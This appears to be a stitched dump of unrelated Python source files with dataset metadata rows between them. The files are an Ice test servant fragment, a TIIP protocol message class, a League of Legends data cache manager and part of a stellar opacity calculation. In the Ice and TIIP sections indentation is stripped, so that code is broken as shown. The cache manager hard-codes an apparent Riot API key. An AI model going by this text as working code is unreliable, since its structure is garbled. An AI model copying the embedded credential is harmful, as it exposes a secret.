                # shutdown can be dispatched before startDispatch.
v = Ice.Future()
v.set_result(None)
return v
elif self._pending:
self._pending.set_result(None)
self._pending = Ice.Future()
return self._pending
def finishDispatch(self, current=None):
with self._cond:
if self._shutdown:
return
elif self._pending: # Pending might not be set yet if startDispatch is dispatch out-of-order
self._pending.set_result(None)
self._pending = None
def shutdown(self, current=None):
with self._cond:
self._shutdown = True
if self._pending:
self._pending.set_result(None)
self._pending = None
current.adapter.getCommunicator().shutdown()
def supportsAMD(self, current=None):
return True
def supportsFunctionalTests(self, current=None):
return False
def pingBiDir(self, id, current = None):
Test.PingReplyPrx.uncheckedCast(current.con.createProxy(id)).reply()
class TestIntfII(Test.Outer.Inner.TestIntf):
def op(self, i, current):
return (i, i)
class TestIntfControllerI(Test.TestIntfController):
def __init__(self, adapter):
self._adapter = adapter
def holdAdapter(self, current=None):
self._adapter.hold()
def resumeAdapter(self, current=None):
self._adapter.activate()
|
gpl-2.0
| -1,354,653,715,512,082,000
| 29.576923
| 107
| 0.566038
| false
| 4.274194
| true
| false
| false
|
whitelizard/pytiip
|
pytiip/tiip.py
|
1
|
13043
|
"""
Python implementation of the TIIP (Thin Industrial Internet Protocol) protocol.
"""
import json
from datetime import datetime as dt
from datetime import timedelta as td
import dateutil.parser as parser
# Python 3 compatibility fixes
import sys
PY3 = sys.version_info > (3,)
if PY3:
long = int
unicode = str
else:
# noinspection PyShadowingBuiltins
bytes = str
__version__ = 'tiip.3.0' # TIIP protocol version
class TIIPMessage(object):
# noinspection PyShadowingBuiltins
def __init__(
self, tiipStr=None, tiipDict=None, ts=None, lat=None, mid=None, sid=None, type=None,
src=None, targ=None, sig=None, ch=None, arg=None, pl=None, ok=None,
ten=None, verifyVersion=True):
"""
@param tiipStr: A string representation of a TIIPMessage to load on init
@param tiipDict: A dictionary representation of a TIIPMessage to load on init
@raise: TypeError, ValueError
All other arguments are keys to set in the TIIPMessage, see TIIP specification for more details:
https://github.com/whitelizard/tiip
"""
# Protocol keys
self.__pv = __version__
self.__ts = self.getTimeStamp()
self.__lat = None
self.__mid = None
self.__sid = None
self.__type = None
self.__src = None
self.__targ = None
self.__sig = None
self.__ch = None
self.__arg = None
self.__pl = None
self.__ok = None
self.__ten = None
# Parse constructor arguments
if tiipStr is not None:
self.loadFromStr(tiipStr, verifyVersion)
if tiipDict is not None:
self.loadFromDict(tiipDict, verifyVersion)
if ts is not None:
self.ts = ts
if lat is not None:
self.lat = lat
if mid is not None:
self.mid = mid
if sid is not None:
self.sid = sid
if type is not None:
self.type = type
if src is not None:
self.src = src
if targ is not None:
self.targ = targ
if sig is not None:
self.sig = sig
if ch is not None:
self.ch = ch
if arg is not None:
self.arg = arg
if pl is not None:
self.pl = pl
if ok is not None:
self.ok = ok
if ten is not None:
self.ten = ten
def __str__(self):
return json.dumps(dict(self))
def __iter__(self):
yield 'pv', self.__pv
yield 'ts', self.__ts
if self.__lat is not None:
yield 'lat', self.__lat
if self.__mid is not None:
yield 'mid', self.__mid
if self.__sid is not None:
yield 'sid', self.__sid
if self.__type is not None:
yield 'type', self.__type
if self.__src is not None:
yield 'src', self.__src
if self.__targ is not None:
yield 'targ', self.__targ
if self.__sig is not None:
yield 'sig', self.__sig
if self.__ch is not None:
yield 'ch', self.__ch
if self.__arg is not None:
yield 'arg', self.__arg
if self.__pl is not None:
yield 'pl', self.__pl
if self.__ok is not None:
yield 'ok', self.__ok
if self.__ten is not None:
yield 'ten', self.__ten
@staticmethod
def getTimeStamp():
"""
Creates a timestamp string representation according to the TIIP-specification for timestamps.
@return:
"""
return dt.utcnow().isoformat(timespec='microseconds') + 'Z'
@property
def pv(self):
return self.__pv
@property
def ts(self):
return self.__ts
@ts.setter
def ts(self, value):
if isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
try:
dateObj = parser.parse(value)
except ValueError:
raise ValueError('timestamp string must be parseable to datetime')
if dateObj.utcoffset() not in [None, td(0)]:
raise ValueError('timestamp string must be in utc timezone')
if value[-1] != 'Z' or value[19] != '.':
raise ValueError('seconds must be decimals and end with Z')
self.__ts = value
elif isinstance(value, dt):
if value.utcoffset() not in [None, td(0)]:
raise ValueError('timestamp string must be in utc timezone')
iso = value.isoformat(timespec='microseconds')
if iso.endswith("+00:00"):
iso = iso[:-6]
self.__ts = iso + 'Z'
else:
            raise TypeError('timestamp can only be of types datetime or a valid unicode or string representation of an ISO 8601 timestamp')
@property
def lat(self):
return self.__lat
@lat.setter
def lat(self, value):
if value is None:
self.__lat = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
try:
float(value) # Check if string is float representation
except ValueError:
raise ValueError('Latency string must be parseable to float')
else:
self.__lat = value
elif isinstance(value, (int, float, long)):
self.__lat = repr(round(value, 6))
else:
raise TypeError('Latency can only be of types None, float, int, long or a valid unicode or string representation of a float')
@property
def mid(self):
return self.__mid
@mid.setter
def mid(self, value):
if value is None:
self.__mid = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__mid = value
else:
raise TypeError('mid can only be of types unicode, str or None')
@property
def sid(self):
return self.__sid
@sid.setter
def sid(self, value):
if value is None:
self.__sid = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__sid = value
else:
raise TypeError('sid can only be of types unicode, str or None')
@property
def type(self):
return self.__type
@type.setter
def type(self, value):
if value is None:
self.__type = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__type = value
else:
raise TypeError('type can only be of types unicode, str or None')
@property
def src(self):
return self.__src
@src.setter
def src(self, value):
if value is None:
self.__src = None
elif isinstance(value, list):
self.__src = value
else:
raise TypeError('source can only be of types list or None')
@property
def targ(self):
return self.__targ
@targ.setter
def targ(self, value):
if value is None:
self.__targ = None
elif isinstance(value, list):
self.__targ = value
else:
raise TypeError('target can only be of types list or None')
@property
def sig(self):
return self.__sig
@sig.setter
def sig(self, value):
if value is None:
self.__sig = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__sig = value
else:
raise TypeError('signal can only be of types unicode, str or None')
@property
def ch(self):
return self.__ch
@ch.setter
def ch(self, value):
if value is None:
self.__ch = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__ch = value
else:
raise TypeError('channel can only be of types unicode, str or None')
@property
def arg(self):
return self.__arg
@arg.setter
def arg(self, value):
if value is None:
self.__arg = None
elif isinstance(value, dict):
self.__arg = value
else:
raise TypeError('arguments can only be of types dict or None')
@property
def pl(self):
return self.__pl
@pl.setter
def pl(self, value):
if value is None:
self.__pl = None
elif isinstance(value, list):
self.__pl = value
else:
raise TypeError('payload can only be of types list or None')
@property
def ok(self):
return self.__ok
@ok.setter
def ok(self, value):
if value is None:
self.__ok = None
elif isinstance(value, bool):
self.__ok = value
else:
raise TypeError('ok can only be of types bool or None')
@property
def ten(self):
return self.__ten
@ten.setter
def ten(self, value):
if value is None:
self.__ten = None
elif isinstance(value, str) or isinstance(value, unicode) or isinstance(value, bytes):
self.__ten = value
else:
raise TypeError('tenant can only be of types unicode, str or None')
def loadFromStr(self, tiipStr, verifyVersion=True):
"""
Loads this object with values from a string or unicode representation of a TIIPMessage.
@param tiipStr: The string to load properties from.
@param verifyVersion: True to verify that tiipDict has the right protocol
@raise: TypeError, ValueError
@return: None
"""
tiipDict = json.loads(tiipStr)
self.loadFromDict(tiipDict, verifyVersion)
def loadFromDict(self, tiipDict, verifyVersion=True):
"""
Loads this object with values from a dictionary representation of a TIIPMessage.
@param tiipDict: The dictionary to load properties from.
@param verifyVersion: True to verify that tiipDict has the right protocol
@raise: TypeError, ValueError
@return: None
"""
if verifyVersion:
if 'pv' not in tiipDict or tiipDict['pv'] != self.__pv:
raise ValueError('Incorrect tiip version "' + str(tiipDict['pv']) + '" expected "' + self.__pv + '"')
if 'pv' not in tiipDict or tiipDict['pv'] != self.__pv:
if tiipDict['pv'] == "tiip.2.0":
if 'ct' in tiipDict:
ct = float(tiipDict['ct'])
ts = float(tiipDict['ts'])
tiipDict['ts'] = str(ct)
tiipDict['lat'] = str(ts - ct)
tiipDict['ts'] = dt.utcfromtimestamp(float(tiipDict['ts'])).isoformat(timespec='microseconds') + 'Z'
if 'ts' in tiipDict:
self.ts = tiipDict['ts']
if 'lat' in tiipDict:
self.lat = tiipDict['lat']
if 'mid' in tiipDict:
self.mid = tiipDict['mid']
if 'sid' in tiipDict:
self.sid = tiipDict['sid']
if 'type' in tiipDict:
self.type = tiipDict['type']
if 'src' in tiipDict:
self.src = tiipDict['src']
if 'targ' in tiipDict:
self.targ = tiipDict['targ']
if 'sig' in tiipDict:
self.sig = tiipDict['sig']
if 'ch' in tiipDict:
self.ch = tiipDict['ch']
if 'arg' in tiipDict:
self.arg = tiipDict['arg']
if 'pl' in tiipDict:
self.pl = tiipDict['pl']
if 'ok' in tiipDict:
self.ok = tiipDict['ok']
if 'ten' in tiipDict:
self.ten = tiipDict['ten']
def asVersion(self, version):
if version == self.__pv:
return str(self)
elif version == "tiip.2.0":
tiipDict = {}
for key, val in self:
tiipDict[key] = val
if "lat" in tiipDict:
ct = parser.parse(tiipDict["ts"]).timestamp()
tiipDict["ct"] = str(ct)
tiipDict["ts"] = str(ct + float(tiipDict["lat"]))
tiipDict.pop("lat")
else:
tiipDict["ts"] = str(parser.parse(tiipDict["ts"]).timestamp())
tiipDict["pv"] = version
return json.dumps(tiipDict)
else:
raise ValueError('Incorrect tiip version. Can only handle versions: tiip.2.0 and tiip.3.0')
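if __name__ == '__main__':
    # Round-trip sketch: build a message, serialize it, and parse it back.
    # The channel and payload values are made up for illustration.
    msg = TIIPMessage(type='pub', ch='sensors/temp', pl=[21.5])
    wire = str(msg)                    # JSON string including 'pv' and 'ts'
    copy = TIIPMessage(tiipStr=wire)   # verifies pv == 'tiip.3.0' by default
    assert copy.ch == 'sensors/temp' and copy.pl == [21.5]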
|
mit
| 1,881,399,946,409,692,700
| 30.936869
| 137
| 0.527026
| false
| 4.261026
| false
| false
| false
|
Cloud-Rush/LOL
|
cacheManager.py
|
1
|
6523
|
import json
import time
import praw
from riotwatcher import RiotWatcher
from riotwatcher import EUROPE_WEST
from riotwatcher import EUROPE_NORDIC_EAST
from riotwatcher import KOREA
from riotwatcher import OCEANIA
from riotwatcher import BRAZIL
from riotwatcher import LATIN_AMERICA_SOUTH
from riotwatcher import LATIN_AMERICA_NORTH
from riotwatcher import NORTH_AMERICA
from riotwatcher import RUSSIA
from riotwatcher import TURKEY
from twitch import *
riot = RiotWatcher('24d89b10-e6ee-469a-91bd-f5e2d15c9e31')
twitch = TwitchTV()
reddit = praw.Reddit(user_agent = 'TheFountain by /u/tstarrs')
submissions = reddit.get_subreddit('leagueoflegends').get_top(limit = 10)
submissions2 = reddit.get_subreddit('summonerschool').get_top(limit = 10)
submissions3 = reddit.get_subreddit('loleventvods').get_top(limit = 10)
#get_top() returns generators, so materialize them before concatenating
allSubmissions = list(submissions) + list(submissions2) + list(submissions3)
cacheFile = open("cacheDatabase.json")
cacheData = json.load(cacheFile)
cacheFile.close()
CHAMPION_TOLERANCE = 180000 #3 min
NEWS_TOLERANCE = 150000 #2.5 min (150000 matches the millisecond convention of the other tolerances)
STREAMER_TOLERANCE = 1800000 #30 min
SUMMONER_TOLERANCE = 3600000 #1 hour
#single save helper; defining saveCache twice (with and without an argument)
#made the one-argument version unreachable and broke setupDatabase()
def saveCache(saveData=None):
	if saveData is None:
		saveData = cacheData
	saveFile = open("cacheDatabase.json","w")
	json.dump(saveData,saveFile)
	saveFile.close()
#used for starting a database from scratch
#this will reset the database
def setupDatabase():
	initData = {}
	initData["champions"] = riot.get_all_champions()
	initData["news"] = allSubmissions
	initData["summoners"] = {}
	initData["streamers"] = twitch.getGameStreams("League of Legends")
	saveCache(initData)
#update methods take what is requested to update, and the new information for it
#adds timestamp information
def updateChampion(name,info):
	if name in cacheData["champions"]:
		cacheData["champions"][name]["time"] = time.time()
		cacheData["champions"][name]["info"] = info
		cacheData["champions"][name]["stale"] = False
	else:
		cacheData["champions"][name] = {}
		cacheData["champions"][name]["time"] = time.time()
		cacheData["champions"][name]["info"] = info
		cacheData["champions"][name]["stale"] = False
	saveCache()
def updateNews(name,info):
	if name in cacheData["news"]:
		cacheData["news"][name]["time"] = time.time()
		cacheData["news"][name]["info"] = info
		cacheData["news"][name]["stale"] = False
	else:
		cacheData["news"][name] = {}
		cacheData["news"][name]["time"] = time.time()
		cacheData["news"][name]["info"] = info
		cacheData["news"][name]["stale"] = False
	saveCache()
def updateStreamer(name,info):
	if name in cacheData["streamers"]:
		cacheData["streamers"][name]["time"] = time.time()
		cacheData["streamers"][name]["info"] = info
		cacheData["streamers"][name]["stale"] = False
	else:
		cacheData["streamers"][name] = {}
		cacheData["streamers"][name]["time"] = time.time()
		cacheData["streamers"][name]["info"] = info
		cacheData["streamers"][name]["stale"] = False
	saveCache()
def updateSummoner(name,info):
	if name in cacheData["summoners"]:
		cacheData["summoners"][name]["time"] = time.time()
		cacheData["summoners"][name]["info"] = info
		cacheData["summoners"][name]["stale"] = False
	else:
		cacheData["summoners"][name] = {}
		cacheData["summoners"][name]["time"] = time.time()
		cacheData["summoners"][name]["info"] = info
		cacheData["summoners"][name]["stale"] = False
	saveCache()
#get basic data
#returns {} if no info exists, or if the data is marked as stale
def getChampionInfo(name):
	if name in cacheData["champions"] and cacheData["champions"][name]["stale"] == False:
		return cacheData["champions"][name]["info"]
	else:
		return {}
def getSummonerInfo(name):
	if name in cacheData["summoners"] and cacheData["summoners"][name]["stale"] == False:
		return cacheData["summoners"][name]["info"]
	else:
		return {}
def getNewsInfo(name):
	if name in cacheData["news"] and cacheData["news"][name]["stale"] == False:
		return cacheData["news"][name]["info"]
	else:
		return {}
def getStreamerInfo(name):
	if name in cacheData["streamers"] and cacheData["streamers"][name]["stale"] == False:
		return cacheData["streamers"][name]["info"]
	else:
		return {}
#trim the database, mark items as stale
def trimCache():
	prunableSummonerKeys = []
	prunableStreamerKeys = []
	prunableNewsKeys = []
	prunableChampionKeys = []
	#for each listing, check how old the data is
	#if the data is old, mark as stale and reset timestamp
	#if data is already stale, mark for deletion
	for name in cacheData["summoners"]:
		if time.time() - SUMMONER_TOLERANCE > cacheData["summoners"][name]["time"]:
			if cacheData["summoners"][name]["stale"] == False:
				cacheData["summoners"][name]["stale"] = True
				cacheData["summoners"][name]["time"] = time.time()
			else:
				prunableSummonerKeys.append(name)
	for name in cacheData["streamers"]:
		if time.time() - STREAMER_TOLERANCE > cacheData["streamers"][name]["time"]:
			if cacheData["streamers"][name]["stale"] == False:
				cacheData["streamers"][name]["stale"] = True
				cacheData["streamers"][name]["time"] = time.time()
			else:
				prunableStreamerKeys.append(name)
	for name in cacheData["news"]:
		if time.time() - NEWS_TOLERANCE > cacheData["news"][name]["time"]:
			if cacheData["news"][name]["stale"] == False:
				cacheData["news"][name]["stale"] = True
				cacheData["news"][name]["time"] = time.time()
			else:
				prunableNewsKeys.append(name)
	for name in cacheData["champions"]:
		if time.time() - CHAMPION_TOLERANCE > cacheData["champions"][name]["time"]:
			if cacheData["champions"][name]["stale"] == False:
				cacheData["champions"][name]["stale"] = True
				cacheData["champions"][name]["time"] = time.time()
			else:
				prunableChampionKeys.append(name)
	#delete the elements marked for deletion
	for pruner in prunableSummonerKeys:
		del cacheData["summoners"][pruner]
	for pruner in prunableStreamerKeys:
		del cacheData["streamers"][pruner]
	for pruner in prunableNewsKeys:
		del cacheData["news"][pruner]
	for pruner in prunableChampionKeys:
		del cacheData["champions"][pruner]
	saveCache()
def test():
	updateStreamer("Emorelleum",{"url":"www.spleen.com","title":"Viktor epic fail"})
	updateNews("Blah", {"Art 1":"la"})
	saveCache()
trimCache()
#don't uncomment this unless you want to reset the database
#setupDatabase()
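# Cache read/refresh pattern (illustrative; the champion name and the fetch
# call are hypothetical, only the cache helpers above are real):
#
# info = getChampionInfo("Viktor")
# if not info:
# 	info = fetch_champion_somehow("Viktor")  # e.g. via the riot client above
# 	updateChampion("Viktor", info)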
|
mit
| 5,110,957,185,815,924,000
| 33.513228
| 87
| 0.687414
| false
| 2.756974
| false
| false
| false
|
sevenian3/ChromaStarPy
|
Kappas.py
|
1
|
33442
|
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 24 17:12:02 2017
@author: ishort
"""
import math
import Planck
import Useful
def kappas2(numDeps, pe, zScale, temp, rho, numLams, lambdas, logAHe, \
logNH1, logNH2, logNHe1, logNHe2, Ne, teff, logKapFudge):
"""/* Compute opacities properly from scratch with real physical cross-sections
*/ // *** CAUTION:
//
// This return's "kappa" as defined by Gray 3rd Ed. - cm^2 per *relelvant particle* where the "releveant particle"
// depends on *which* kappa """
#//
#// *** CAUTION:
#//
#// This return's "kappa" as defined by Gray 3rd Ed. - cm^2 per *relelvant particle* where the "releveant particle"
#// depends on *which* kappa
log10E = math.log10(math.e) #//needed for g_ff
logLog10E = math.log(log10E)
logE10 = math.log(10.0)
logNH = [0.0 for i in range(numDeps)] #//Total H particle number density cm^-3
#double logPH1, logPH2, logPHe1, logPHe2;
for i in range(numDeps):
logNH[i] = math.exp(logNH1[i]) + math.exp(logNH2[i])
logNH[i] = math.log(logNH[i])
#//System.out.println("i " + i + " logNH1 " + log10E*logNH1[i] + " logNH2 " + log10E*logNH2[i]
#//+ " logNHe1 " + log10E*logNHe1[i] + " logNHe2 " + log10E*logNHe2[i] + " logPe " + log10E*pe[1][i]);
#// logPH1 = logNH1[i] + temp[1][i] + Useful.logK();
#// logPH2 = logNH2[i] + temp[1][i] + Useful.logK();
#// logPHe1 = logNHe1[i] + temp[1][i] + Useful.logK();
#// logPHe2 = logNHe2[i] + temp[1][i] + Useful.logK();
#//System.out.println("i " + i + " logPH1 " + log10E*logPH1 + " logPH2 " + log10E*logPH2
#//+ " logPHe1 " + log10E*logPHe1 + " logPHe2 " + log10E*logPHe2 + " logPe " + log10E*pe[1][i]);
#double[][] logKappa = new double[numLams][numDeps];
logKappa = [ [0.0 for i in range(numDeps)] for j in range(numLams) ]
#double kappa; //helper
#double stimEm; //temperature- and wavelength-dependent stimulated emission correction
#double stimHelp, logStimEm;
#double ii; //useful for converting integer loop counter, i, to float
#//
#//
#//Input data and variable declarations:
#//
#//
#// H I b-f & f-f
chiIH = 13.598433 #//eV
Rydberg = 1.0968e-2 #// "R" in nm^-1
#//Generate threshold wavelengths and b-f Gaunt (g_bf) helper factors up to n=10:
#double n; //principle quantum number of Bohr atom E-level
numHlevs = 10
#double logChiHlev;
invThresh = [0.0 for i in range(numHlevs)] #//also serves as g_bf helper factor
threshLambs = [0.0 for i in range(numHlevs)]
chiHlev = [0.0 for i in range(numHlevs)]
for i in range(numHlevs):
n = 1.0 + float(i)
invThresh[i] = Rydberg / n / n #//nm^-1; also serves as g_bf helper factor
threshLambs[i] = 1.0 / invThresh[i] #//nm
logChiHlev = Useful.logH() + Useful.logC() + math.log(invThresh[i]) + 7.0*logE10 #// ergs
chiHlev[i] = math.exp(logChiHlev - Useful.logEv()) #//eV
chiHlev[i] = chiIH - chiHlev[i]
#// System.out.println("i " + i + " n " + n + " invThresh " + invThresh[i] + " threshLambs[i] " + threshLambs[i] + " chiHlev " + chiHlev[i]);
logGauntPrefac = math.log(0.3456) - 0.333333*math.log(Rydberg)
    #// **** Caution: this will require lambda in A!:
a0 = 1.0449e-26 #//if lambda in A
logA0 = math.log(a0)
#// Boltzmann const "k" in eV/K - needed for "theta"
logKeV = Useful.logK() - Useful.logEv()
#//g_bf Gaunt factor - depends on lower E-level, n:
loggbf = [0.0 for i in range(numHlevs)]
#//initialize quantities that depend on lowest E-level contributing to opacity at current wavelength:
for iThresh in range(numHlevs):
loggbf[iThresh] = 0.0
#double logGauntHelp, gauntHelp;
#double gbf, gbfHelp, loggbfHelp;
#double gff, gffHelp, loggffHelp, logffHelp, loggff;
#double help, logHelp3;
#double chiLambda, logChiLambda;
#double bfTerm, logbfTerm, bfSum, logKapH1bf, logKapH1ff;
#//initial defaults:
gbf = 1.0
gff = 1.0
loggff = 0.0
logChiFac = math.log(1.2398e3) #// eV per lambda, for lambda in nm
#// Needed for kappa_ff:
#double ffBracket;
logffHelp = logLog10E - math.log(chiIH) - math.log(2.0)
#//logHelp = logffHelp - math.log(2.0)
#//
#//Hminus:
#//
#// H^- b-f
#//This is for the sixth order polynomial fit to the cross-section's wavelength dependence
numHmTerms = 7
logAHm = [0.0 for i in range(numHmTerms)]
signAHm = [0.0 for i in range(numHmTerms)]
aHmbf = 4.158e-10
#//double logAHmbf = Math.log(aHmbf);
#//Is the factor of 10^-18cm^2 from the polynomial fit to alpha_Hmbf missing in Eq. 8.12 on p. 156 of Gray 3rd Ed??
logAHmbf = math.log(aHmbf) - 18.0*logE10
#double alphaHmbf, logAlphaHmbf, logTermHmbf, logKapHmbf;
#//Computing each polynomial term logarithmically
logAHm[0] = math.log(1.99654)
signAHm[0] = 1.0
logAHm[1] = math.log(1.18267e-5)
signAHm[1] = -1.0
logAHm[2] = math.log(2.64243e-6)
signAHm[2] = 1.0
logAHm[3] = math.log(4.40524e-10)
signAHm[3] = -1.0
logAHm[4] = math.log(3.23992e-14)
signAHm[4] = 1.0
logAHm[5] = math.log(1.39568e-18)
signAHm[5] = -1.0
logAHm[6] = math.log(2.78701e-23)
signAHm[6] = 1.0
alphaHmbf = math.exp(logAHm[0]) #//initialize accumulator
#// H^- f-f:
logAHmff = -26.0*logE10
numHmffTerms = 5
#double fPoly, logKapHmff, logLambdaAFac;
fHmTerms = [ [ 0.0 for i in range(numHmffTerms) ] for j in range(3) ]
fHm = [0.0 for i in range(3)]
fHmTerms[0][0] = -2.2763
fHmTerms[0][1] = -1.6850
fHmTerms[0][2] = 0.76661
fHmTerms[0][3] = -0.053346
fHmTerms[0][4] = 0.0
fHmTerms[1][0] = 15.2827
fHmTerms[1][1] = -9.2846
fHmTerms[1][2] = 1.99381
fHmTerms[1][3] = -0.142631
fHmTerms[1][4] = 0.0
fHmTerms[2][0] = -197.789
fHmTerms[2][1] = 190.266
fHmTerms[2][2] = -67.9775
fHmTerms[2][3] = 10.6913
fHmTerms[2][4] = -0.625151
#//
#//H_2^+ molecular opacity - cool stars
    #// scales with proton density (H^+)
#//This is for the third order polynomial fit to the "sigma_l(lambda)" and "U_l(lambda)"
#//terms in the cross-section
numH2pTerms = 4
sigmaH2pTerm = [0.0 for i in range(numH2pTerms)]
UH2pTerm = [0.0 for i in range(numH2pTerms)]
#double logSigmaH2p, sigmaH2p, UH2p, logKapH2p;
aH2p = 2.51e-42
logAH2p = math.log(aH2p)
sigmaH2pTerm[0] = -1040.54
sigmaH2pTerm[1] = 1345.71
sigmaH2pTerm[2] = -547.628
sigmaH2pTerm[3] = 71.9684
#//UH2pTerm[0] = 54.0532
#//UH2pTerm[1] = -32.713
#//UH2pTerm[2] = 6.6699
#//UH2pTerm[3] = -0.4574
#//Reverse signs on U_1 polynomial expansion co-efficients - Dave Gray private communcation
#//based on Bates (1952)
UH2pTerm[0] = -54.0532
UH2pTerm[1] = 32.713
UH2pTerm[2] = -6.6699
UH2pTerm[3] = 0.4574
#// He I b-f & ff:
#double totalH1Kap, logTotalH1Kap, helpHe, logKapHe;
#//
#//He^- f-f
AHe = math.exp(logAHe)
#double logKapHemff, nHe, logNHe, thisTerm, thisLogTerm, alphaHemff, log10AlphaHemff;
#// Gray does not have this pre-factor, but PHOENIX seems to and without it
#// the He opacity is about 10^26 too high!:
logAHemff = -26.0*logE10
numHemffTerms = 5
logC0HemffTerm = [0.0 for i in range(numHemffTerms)]
logC1HemffTerm = [0.0 for i in range(numHemffTerms)]
logC2HemffTerm = [0.0 for i in range(numHemffTerms)]
logC3HemffTerm = [0.0 for i in range(numHemffTerms)]
signC0HemffTerm = [0.0 for i in range(numHemffTerms)]
signC1HemffTerm = [0.0 for i in range(numHemffTerms)]
signC2HemffTerm = [0.0 for i in range(numHemffTerms)]
signC3HemffTerm = [0.0 for i in range(numHemffTerms)]
#//we'll be evaluating the polynominal in theta logarithmically by adding logarithmic terms -
logC0HemffTerm[0] = math.log(9.66736)
signC0HemffTerm[0] = 1.0
logC0HemffTerm[1] = math.log(71.76242)
signC0HemffTerm[1] = -1.0
logC0HemffTerm[2] = math.log(105.29576)
signC0HemffTerm[2] = 1.0
logC0HemffTerm[3] = math.log(56.49259)
signC0HemffTerm[3] = -1.0
logC0HemffTerm[4] = math.log(10.69206)
signC0HemffTerm[4] = 1.0
logC1HemffTerm[0] = math.log(10.50614)
signC1HemffTerm[0] = -1.0
logC1HemffTerm[1] = math.log(48.28802)
signC1HemffTerm[1] = 1.0
logC1HemffTerm[2] = math.log(70.43363)
signC1HemffTerm[2] = -1.0
logC1HemffTerm[3] = math.log(37.80099)
signC1HemffTerm[3] = 1.0
logC1HemffTerm[4] = math.log(7.15445)
signC1HemffTerm[4] = -1.0
logC2HemffTerm[0] = math.log(2.74020)
signC2HemffTerm[0] = 1.0
logC2HemffTerm[1] = math.log(10.62144)
signC2HemffTerm[1] = -1.0
logC2HemffTerm[2] = math.log(15.50518)
signC2HemffTerm[2] = 1.0
logC2HemffTerm[3] = math.log(8.33845)
signC2HemffTerm[3] = -1.0
logC2HemffTerm[4] = math.log(1.57960)
signC2HemffTerm[4] = 1.0
logC3HemffTerm[0] = math.log(0.19923)
signC3HemffTerm[0] = -1.0
logC3HemffTerm[1] = math.log(0.77485)
signC3HemffTerm[1] = 1.0
logC3HemffTerm[2] = math.log(1.13200)
signC3HemffTerm[2] = -1.0
logC3HemffTerm[3] = math.log(0.60994)
signC3HemffTerm[3] = 1.0
logC3HemffTerm[4] = math.log(0.11564)
signC3HemffTerm[4] = -1.0
# //initialize accumulators:
cHemff = [0.0 for i in range(4)]
cHemff[0] = signC0HemffTerm[0] * math.exp(logC0HemffTerm[0]);
cHemff[1] = signC1HemffTerm[0] * math.exp(logC1HemffTerm[0]);
cHemff[2] = signC2HemffTerm[0] * math.exp(logC2HemffTerm[0]);
cHemff[3] = signC3HemffTerm[0] * math.exp(logC3HemffTerm[0]);
#//
    #//Should the polynomial expansion for the Cs be in log10Theta?? No! Doesn't help:
#//double[] C0HemffTerm = new double[numHemffTerms];
#//double[] C1HemffTerm = new double[numHemffTerms];
#//double[] C2HemffTerm = new double[numHemffTerms];
#//double[] C3HemffTerm = new double[numHemffTerms];
#//
#//C0HemffTerm[0] = 9.66736;
#//C0HemffTerm[1] = -71.76242;
#//C0HemffTerm[2] = 105.29576;
#//C0HemffTerm[3] = -56.49259;
#//C0HemffTerm[4] = 10.69206;
#//C1HemffTerm[0] = -10.50614;
#//C1HemffTerm[1] = 48.28802;
#//C1HemffTerm[2] = -70.43363;
#//C1HemffTerm[3] = 37.80099;
#//C1HemffTerm[4] = -7.15445;
#//C2HemffTerm[0] = 2.74020;
#//C2HemffTerm[1] = -10.62144;
#//C2HemffTerm[2] = 15.50518;
#//C2HemffTerm[3] = -8.33845;
#//C2HemffTerm[4] = 1.57960;
#//C3HemffTerm[0] = -0.19923;
#//C3HemffTerm[1] = 0.77485;
#//C3HemffTerm[2] = -1.13200;
#//C3HemffTerm[3] = 0.60994;
#//C3HemffTerm[4] = -0.11564;
#//initialize accumulators:
#// double[] cHemff = new double[4];
#// cHemff[0] = C0HemffTerm[0];
#// cHemff[1] = C1HemffTerm[0];
#// cHemff[2] = C2HemffTerm[0];
#// cHemff[3] = C3HemffTerm[0];
#//
#// electron (e^-1) scattering (Thomson scattering)
#double kapE, logKapE;
alphaE = 0.6648e-24 #//cm^2/e^-1
logAlphaE = math.log(0.6648e-24)
#//Universal:
#//
# double theta, logTheta, log10Theta, log10ThetaFac;
# double logLambda, lambdaA, logLambdaA, log10LambdaA, lambdanm, logLambdanm;
#//Okay - here we go:
    #//Make the wavelength loop the outer loop - lots of depth-independent lambda-dependent quantities:
#//
#//
# //System.out.println("Kappas called...");
#//
#// **** START WAVELENGTH LOOP iLam
#//
#//
#//
for iLam in range(numLams):
#//
#//Re-initialize all accumulators to be on safe side:
kappa = 0.0
logKapH1bf = -99.0
logKapH1ff = -99.0
logKapHmbf = -99.0
logKapHmff = -99.0
logKapH2p = -99.0
logKapHe = -99.0
logKapHemff = -99.0
logKapE = -99.0
#//
        #//*** CAUTION: lambda MUST be in nm here for consistency with Rydberg
logLambda = math.log(lambdas[iLam]) #//log cm
lambdanm = 1.0e7 * lambdas[iLam]
logLambdanm = math.log(lambdanm)
lambdaA = 1.0e8 * lambdas[iLam] #//Angstroms
logLambdaA = math.log(lambdaA)
log10LambdaA = log10E * logLambdaA
logChiLambda = logChiFac - logLambdanm
chiLambda = math.exp(logChiLambda) #//eV
#// Needed for both g_bf AND g_ff:
logGauntHelp = logGauntPrefac - 0.333333*logLambdanm #//lambda in nm here
gauntHelp = math.exp(logGauntHelp)
#// if (iLam == 142){
#// System.out.println("lambdaA " + lambdaA);
#// }
#//HI b-f depth independent factors:
#//Start at largest threshold wavelength and break out of loop when next threshold lambda is less than current lambda:
#for (iThresh = numHlevs-1; iThresh >= 0; iThresh--){
        for iThresh in range(numHlevs-1, -1, -1): #count down, per the Java loop above; range(0, numHlevs-1, -1) iterated zero times
if (threshLambs[iThresh] < lambdanm):
break
if (lambdanm <= threshLambs[iThresh]):
#//this E-level contributes
loggbfHelp = logLambdanm + math.log(invThresh[iThresh]) # //lambda in nm here; invThresh here as R/n^2
gbfHelp = math.exp(loggbfHelp)
gbf = 1.0 - (gauntHelp * (gbfHelp - 0.5))
#// if (iLam == 1){}
#// System.out.println("iThresh " + iThresh + " threshLambs " + threshLambs[iThresh] + " gbf " + gbf);
#// }
loggbf[iThresh] = math.log(gbf)
#//end iThresh loop
#//HI f-f depth independent factors:
